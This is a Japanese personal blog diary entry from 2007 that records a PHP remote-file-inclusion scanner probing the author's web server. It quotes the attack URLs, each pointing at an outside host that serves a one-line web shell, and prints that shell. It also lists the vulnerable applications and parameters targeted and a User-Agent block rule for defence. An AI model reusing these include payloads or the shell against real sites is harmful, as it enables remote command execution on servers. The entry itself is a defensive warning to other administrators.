にっき
2007/04/05 12:32:58
新種なのかなぁ?
なんだかやろうとしてることは07/03/23のにっきや07/04/02のにっきで出てきた
"Morfeus Fucking Scanner" っていうのとほとんど変わんないから新種ってよりも亜種かなぁ?
検索するとか〜ねるさんだ〜すさんが引っかかるんだけど・・・ (´ω`;【みかん
そんなこんなで今回は "Colonela WebSecure2791" ってゆ〜ざえ〜じぇんとの中の人が
引用:
なかんじで 404 をぺちぺち叩いてきましたです(ーxー;【みかん
今回のいんくる〜ど対象になる
の中身はこんなかんじ☆
・
・
・
die のときに出すめっせ〜じを替えただけってぜんぜん進歩してにゃいね(´ω`;【みかん
ってことで発動条件も前回とおんなじ
こんなかんじかなぁ?
た〜げっとになってたのは
こんなかんじでなんだか常連さんいるにゃぁ・・・
該当するのがなかったひともたぶんきっところころ追加されるので気をつけてくださいにう☆ヾ(´ω`;【みかん
今回のも変わった User-Agent してるから
こんなかんじではじけるのかなぁ?
でもうぇぶせきゅあってお名前なんだからちぇっくだけにしておいてほしいものにう(´・ω・`;【みかん
"Morfeus Fucking Scanner" っていうのとほとんど変わんないから新種ってよりも亜種かなぁ?
検索するとか〜ねるさんだ〜すさんが引っかかるんだけど・・・ (´ω`;【みかん
そんなこんなで今回は "Colonela WebSecure2791" ってゆ〜ざえ〜じぇんとの中の人が
引用:
/actions/del.php?include_path=http://210.18.229.21/statistic.txt?&/
/cbcms/mod_cbsms_messages.php?mosConfig_absolute_path=http://210.18.229.21/statistic.txt?&/
/components/com_performs/performs.php?mosConfig_absolute_path=http://210.18.229.21/statistic.txt?&/
/fcring.php?s_fuss=http://210.18.229.21/statistic.txt?&/
/includes/db_adodb.php?baseDir=http://210.18.229.21/statistic.txt?&/
/index.php?func=http://210.18.229.21/statistic.txt?&/
/opac_css/includes/resa_func.inc.php?class_path=http://210.18.229.21/statistic.txt?&/
/top.php?laypath=http://210.18.229.21/statistic.txt?&/
なかんじで 404 をぺちぺち叩いてきましたです(ーxー;【みかん
今回のいんくる〜ど対象になる
http://210.18.229.21/statistic.txt?&/の中身はこんなかんじ☆
<?
system($_GET['cmd']);
die ("Sorry is vuln 2791");
?>・
・
・
die のときに出すめっせ〜じを替えただけってぜんぜん進歩してにゃいね(´ω`;【みかん
ってことで発動条件も前回とおんなじ
register_grobals = on
allow_url_fopen = on
short_open_tag = on
外部ふぁいるをいんくる〜どできる php すくりぷとを設置中こんなかんじかなぁ?
た〜げっとになってたのは
Admin Phorum ←include_path の上書き
DBImageGallery ←donsimg_base_path の上書き
Mambo ←mosConfig_live_site か mosConfig_absolute_path か sbp の上書き
Back-End CMS ←_PSL[classdir] の上書き
Ultimate Fun Book ←gbpfad の上書き
eFiction ←path_to_smf の上書き
PMB ←class_path の上書き
ExtCalThai ←CONFIG_EXT[LANGUAGES_DIR] の上書き
phpBB ←phpbb_root_path の上書き
EQdkp ←eqdkp_root_path の上書き
AgreMenu ←rootdir の上書き
Fast Click ←path の上書き
FCring ←s_fuss の上書き
Sinapis Forum ←fuss の上書き
dotproject ←baseDir の上書き
DBGuestBook ←dbs_base_path の上書き
Limbo-CMS ←classes_dir の上書き
PHP Live ←css_path の上書き
MyPHPNuke ←adminpath の上書き
Phorum ←db_file の上書き
PHP Module Implementaion Project ←laypath の上書き
SendStudio ←ROOTDIR の上書き
Sabdrimer CMS ←pluginpath[0] の上書き
aardvark topsites php ←FORM['url'],CONFIG['captcha'],CONFIG['path'] をまとめて上書き
UBB.Threads ←thispath の上書き
/index.php ←func か page の上書き・・・だけど一般的過ぎて絞り込めないにう(つx;【みかんこんなかんじでなんだか常連さんいるにゃぁ・・・
該当するのがなかったひともたぶんきっところころ追加されるので気をつけてくださいにう☆ヾ(´ω`;【みかん
今回のも変わった User-Agent してるから
SetEnvIf User-Agent "^Colonela" ...こんなかんじではじけるのかなぁ?
でもうぇぶせきゅあってお名前なんだからちぇっくだけにしておいてほしいものにう(´・ω・`;【みかん
こめんと
投稿された内容の著作権はこめんとの投稿者に帰属するっぽいです☆また,現在 IE6 以下で Sleipnir,Lunascape,Donut じゃないゆ〜ざえ〜じぇんとからの描き込みを制限してますです☆
該当しちゃうかたはてきとうにゆ〜ざえ〜じぇんとを偽装しちゃってくださいです(´ω`;【みかん
あじ
ED
えでん
えれふぃ
ぐらぶれ
etc
にっき